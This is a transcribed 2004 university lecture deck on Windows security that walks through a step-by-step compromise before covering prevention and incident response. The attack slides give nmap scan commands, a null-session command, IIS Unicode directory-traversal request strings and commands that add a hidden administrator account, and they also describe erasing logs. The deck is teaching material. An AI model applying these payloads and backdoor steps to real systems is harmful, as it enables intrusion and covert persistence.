Windows Security Analysis
Download
Report
Transcript Windows Security Analysis
Slide 1
Windows Security Analysis
Computer Science E-Commerce Security ‘2004’
Matthew Cook
http://escarpment.net/
1
Slide 2
Introduction
Senior IT Security Specialist
Loughborough University
http://www.lboro.ac.uk/computing/
2
Slide 3
Windows Security Analysis
Introduction
Step-by-step Machine Compromise
Preventing Attack
Incident Response
Further Reading
3
Slide 4
Introduction
Basic Security Overview
4
Slide 5
Physical Security
Secure Location
BIOS restrictions
Password Protection
Boot Devices
Case Locks
Case Panels
5
Slide 6
Security Threats
Denial of Service
Theft of information
Modification
Fabrication (Spoofing or Masquerading)
6
Slide 7
Security Threats…
Why a compromise can occur:
Physical Security Holes
Software Security Holes
Incompatible Usage Security Holes
Social Engineering
Complacency
7
Slide 8
The Easiest Security Improvement
Good passwords
Usernames and Passwords are the primary
security defence
Use a password that is easy to type to avoid
‘Shoulder Surfers’
Use the first letters from song titles, song
lyrics or film quotations
8
Slide 9
Step-by-step Machine
Compromise
Why, where, how?
9
Slide 10
Background
Reasons for Attack:
Personal Issues
Political Statement
Financial Gain (Theft of money, information)
Learning Experience
DoS (Denial of Service)
Support for Illegal Activity
10
Slide 11
Gathering Information
Companies House
Internet Search
URL: http://www.google.co.uk
Whois
URL: http://www.netsol.com/cgi-bin/whois/whois
A Whois query can provide:
– The Registrant
– The Domain Names Registered
– The Administrative, Technical and Billing Contact
– Record updated and created date stamps
– DNS Servers for the Domain
11
Slide 12
Gathering Information…
Use Nslookup or dig
dig @<dns server> <machine address>
Different query type available:
– A – Network address
– Any – All or Any Information available
– Mx – Mail exchange records
– Soa – Zone of Authority
– Hinfo – Host information
– Axfr – Zone Transfer
– Txt – Additional strings
12
Slide 13
Identifying System Weakness
Many products available:
Nmap
Nessus
Pwdump
L0pht Crack
Null Authentication
13
Slide 14
Nmap
Port Scanning Tool
Stealth scanning, OS Fingerprinting
Open Source
Runs under Unix based OS
Port development for Win32
URL: http://www.insure.org/nmap/
14
Slide 15
Nmap
15
Slide 16
Nessus
Remote security scanner
Very comprehensive
Frequently updated modules
Testing of DoS attacks
Open Source
Win32 and Java Client
URL: http://nessus.org/
16
Slide 17
pwdump
Version 3 (e = encrypted)
Developed by Phil Staubs and Erik
Hjelmstad
Based on pwdump and pwdump2
URL: http://www.ebiz-tech.com/html/pwdump.html
Needs Administrative Privilidges
Extracts hashs even if syskey is installed
Extract from remote machines
Identifies accounts with no password
Self contained utility
17
Slide 18
L0pht Crack
Password Auditing and Recovery
Crack Passwords from many sources
Registration $249
URL: http://www.atstake.com/research/lc3/
18
Slide 19
L0pht Crack
Crack Passwords from:
Local Machine
Remote Machine
SAM File
SMB Sniffer
PWDump file
19
Slide 20
Nmap Analysis
-
nmap –sP 158.125.0.0/16
Ping scan!
nmap –sS 158.125.0.0/16
- Stealth scan
20
Slide 21
Nmap Analysis…
TCP Connect Scan
Completes a ‘Three Way Handshake’
Very noisy (Detection by IDS)
21
Slide 22
Nmap Analysis…
TCP SYN Scan
Half open scanning (Full port TCP
connection not made)
Less noisy than the TCP Connect Scan
22
Slide 23
Nmap Analysis…
TCP FIN Scan
TCP Xmas Tree Scan
TCP Null Scan
UDP Scan
– FIN Packet sent to target port
– RST returned for all closed ports
– Mostly works UNIX based TCP/IP Stacks
– Sends a FIN, URG and PUSH packet
– RST returned for all closed ports
– Turns off all flags
– RST returned for all closed ports
– UDP Packet sent to target port
– “ICMP Port Unreachable” for closed ports
23
Slide 24
Null Authentication
Null Authentication:
Net use \\camford\IPC$ “” /u:“”
Famous tools like ‘Red Button’
Net view \\camford
List of Users, groups and shares
Last logged on date
Last password change
Much more…
24
Slide 25
Exploiting the Security Hole
Using IIS Unicode/Directory Traversal
/scripts/../../winnt/system32/cmd.exe /c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
Displays the listing of c: in browser
Copy cmd.exe to /scripts/root.exe
Echo upload.asp
GET /scripts/root.exe /c+echo+[blah]>upload.asp
Upload cmdasp.asp using upload.asp
Still vulnerable on 24% of E-Commerce servers
25
Slide 26
Gaining ‘Root’
Cmdasp.asp provides a cmd shell in the
SYSTEM context
Increase in privileges is now simple
ISAPI.dll – RevertToSelf (Horovitz)
Version 2 coded by Foundstone
http://camford/scripts/idq.dll?
Patch Bulletin: MS01-26
NOT included in Windows 2000 SP2
26
Slide 27
Backdoor Access
Create several user accounts
Net user iisservice <pass> /ADD
Net localgroup administrators iisservice /ADD
Add root shells on high end ports
Tiri is 3Kb in size
Add backdoors to ‘Run’ registry keys
27
Slide 28
System Alteration
Web page alteration
Information Theft
Enable services
Add VNC
Creating a Warez Server
Net start msftpsvc
Check access
Upload file 1Mb in size
Advertise as a warez server
28
Slide 29
Audit Trail Removal
Many machines have auditing disabled
Main problems are IIS logs
DoS IIS before logs sync to disc
Erase logs from hard disc
Erasing Eventlog harder
IDS Systems
Network Monitoring at firewall
29
Slide 30
Preventing Attack
How to stop the attack from
happening and how to limit the
damage from crackers!
30
Slide 31
NetBIOS/SMB Services
NetBIOS Browsing Request [UDP 137]
NetBIOS Browsing Response [UDP 138]
NetBIOS Communications [TCP 135]
CIFS [TCP 139, 445 UDP 445]
Port 445 Windows 2000 only
Block ports at firewall
Netstat -A
31
Slide 32
NetBIOS/SMB Services…
To disable NetBIOS
1. Select ‘Disable NetBIOS’ in the WINS tab of
advanced TCP/IP properties.
2. Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and Dialup connections’ window
32
Slide 33
NetBIOS/SMB Services…
Disable Null Authentication
HKLM\SYSTEM\CurrentControlSet\Control\LSA\Re
strictAnonymous
REG_DWORD set to 0, 1 or 2!
HKLM\SYSTEM\CurrentControlSet\Control\Secure
PipeServers\RestrictAnonymous
REG_DWORD set to 0 or 1
33
Slide 34
Operating System Patching
Operating Systems do contain bugs, and
patches are a common method of distributing
these fixes.
A patch or hot fix usually contains a fix for
one discovered bug.
Service packs contain multiple patches or
hotfixes.
34
Slide 35
Operating System Patching…
Only install patches after you have tested
them in a development environment.
Only install patches obtained direct from the
vendor.
Install security patches as soon as possible
after released.
Install feature patches as and when needed.
Automate patch collection and installation as
much as possible (QChain).
35
Slide 36
Operating System Patching…
Use automated patching technology:
SUS – Microsoft Software Update Service
SMS – Microsoft Systems Management
Server
Ghost – Symantec imaging software.
And other application deployment software:
Lights out Distribution
Deferred installation
36
Slide 37
IPSec
IP security
Linux Connectivity using FreeS/WAN
Mainly for wireless use
WEP encryption cracked
URL: http://www.freeswan.org/
URL: http://airsnort.sourceforge.net/
37
Slide 38
Well Known Worms
Nimda
Directory Traversal (Unicode Exploit)
Slammer
MS SQL Server transaction control
Blaster
MS Port 135 DCom vulnerabilities
Sasser
MS Port 445 vulnerabilities
38
Slide 39
Incident Response
What to do when something does
go wrong!
39
Slide 40
Incident Response…
Don’t Panic!
Unplug the network
Get a notebook
Back-up the system and keep the Back-ups
Restrict use of email
Look for information
Investigate the cause
Request help and assistance.
40
Slide 41
Incident Response…
Important to return to service swiftly
– Do not jeopardize security
– If in doubt, re-build
– Perform forensics on a backup
Keep documentation and evidence
Contact local CERT if investigation proves
non worm/script kiddie activity.
41
Slide 42
Further Reading
Garfinkel, S. Web Security & Commerce
O’Reilly [ISBN 1-56592-269-7]
Hassler, V. Security Fundamentals for E-Commerce
Artech House [ISBN 1-58053-108-3]
Huth, M R A. Secure Communicating Systems
Cambridge Uni Press [ISBN 0-52180-731-X]
Schneier, B. Secrets & Lies (Digital Security in a
Networked World) [ISBN 0-47125-311-1]
42
Slide 43
Useful Books, Tools and URLs
Securing Windows NT/2000 Servers for the
Internet. (Stefan Norberg.)
Incident Response. (Kenneth R. van Wyk,
Richard Forno.)
Hacking Exposed: Network Security Secrets
& Solutions. (Stuart McClure et al)
Hacking Exposed Windows 2000: Network
Security Secrets and Solutions. (Scambray.)
43
Slide 44
Useful Books, Tools and URLs
Microsoft Security Website
http://www.microsoft.com/security/
Computer Security Incident Response Team
http://www.cert.org/csirts/csirt_faq.html
JANET CERT
http://www.ja.net/cert/
Bugtraq Mailing List
http://online.securityfocus.com/
44
Slide 45
Questions
Slides available at:
http://escarpment.net/
45